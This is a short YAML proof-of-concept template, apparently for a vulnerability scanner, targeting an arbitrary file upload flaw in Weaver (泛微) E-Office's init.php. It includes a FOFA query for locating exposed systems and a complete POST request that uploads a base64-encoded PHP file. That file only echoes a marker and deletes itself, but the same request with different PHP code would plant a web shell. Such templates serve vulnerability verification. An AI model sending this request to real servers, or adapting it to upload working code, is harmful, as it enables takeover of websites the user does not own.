product: 泛微E-Office
vName: 泛微E-Office init.php文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 泛微E-Office init.php文件存在任意文件上传漏洞，攻击者可以通过该漏洞直接获取网站权限。
version: ''
note: 请求响应中返回的url地址，当前请求中文件名为52e039302a62d077.php
search:
  FOFA: app="泛微-EOffice"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17677388.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /E-mobile/App/init.php
      data: m=common_Common_Flow&f=flowDo&diff=feedback&RUN_ID=1&USER_ID=1&CONTENT=1&FLOW_ID=1&upload_file=PD9waHAgZWNobyAiOTVjYzY0ZGQyODI1ZjlkZjEzZWM0YWQ2ODNlY2YzMzkiO3VubGluayhfX0ZJTEVfXyk7Pz4=&file_name=52e039302a62d077.php
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 52e039302a62d077.php
            logic: and